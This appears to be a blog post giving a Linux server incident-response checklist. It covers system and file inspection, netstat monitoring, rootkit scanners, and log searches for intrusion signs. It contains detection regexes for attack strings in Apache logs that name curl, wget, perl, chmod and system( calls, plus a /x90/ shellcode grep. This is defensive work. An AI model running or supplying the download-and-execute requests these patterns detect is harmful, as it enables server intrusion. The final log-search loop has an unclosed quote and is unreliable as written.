What version of Linux is running
root:~#cat /etc/redhat-release
or for non Red-Hat Linux
root:~#cat /etc/issue
Comapre this to the kernel
root:~#uname -a
and
root:~#cat /proc/version
Who is the author of the file:
root:~#ls –la --author
When was the last time the file has been accessed and by who:
root:~#ls -l --time=access
Before you run off and use the cat command it is good to first check the file type with the file command. Many a time I myself have been fooled seeing a file marked as something.html and finding it was really a binary file.
What kind of file is it:
root:~#file filename
or
root:~#file /path/to/directory/*
Real Time Network Activity Examples:
root:~#watch -d "netstat -nalp |grep -v DGRAM |grep -v STREAM |grep -v LISTEN"
root:~#watch "netstat -nalp"|grep ":TCP PORT Number"
root:~#watch "netstat -nalp"|grep ":22"
Update the Locate Database:
root:~#updatedb &
Search for Apache Exploit
for i in `locate access_log` ; do echo $i ; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i ; done
or
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
cPanel
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Plesk
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*
Of course not every thing that it locates is an exploit, it takes some interpreting. You are looking for obvious things such as a call to wget to download a file, or a call to perl that looks strangely out of place. However one thing this script does not search for is a call to shell code. Once you locate the access logs run a second search for long strings containing /x90/. I have yet to find a good interpreter of what these shell codes do but again google.com is your friend. Most often you can do a search for the code itself and come up with a technical explanation of what the code does.
Search for Shell Code:
cat /path/to/access/logs/* |grep "/x90/"
Finally now you can run your favorite virus scan and root kit hunter. Some favorites include rkhunter and chkrootkit.
ChkRootkit
http://www.chkrootkit.org
RKHunter
http://www.rootkit.nl
Hopefully by now the updatedb has finished, you can check the status of that by usingthe jobs command. Look for things that are out of place and dont belong, are there .bash_history or access_log files that seem to be in the wrong area. This is where you try to think like a hacker and try to find the strange things that just don’t seem right.
Think Like a Hacker in Your Search
root:~#locate .bash_history
root:~#locate access_log
root:~#locate "..."
root:~#locate ".. "
root:~#locate " .."
root:~#locate ". "
root:~#locate " ."
Who Ownes the IP Address
root:~#whois 12.34.56.78
Gather all Data About the IP Address
root:~#for i in `ls /var/log -la |grep -v drwx |grep -v lrwx | awk '{print $9}'`; do echo /var/log/$i; cat /var/log/$i |grep "12.34.56.78 ; done
No comments:
Post a Comment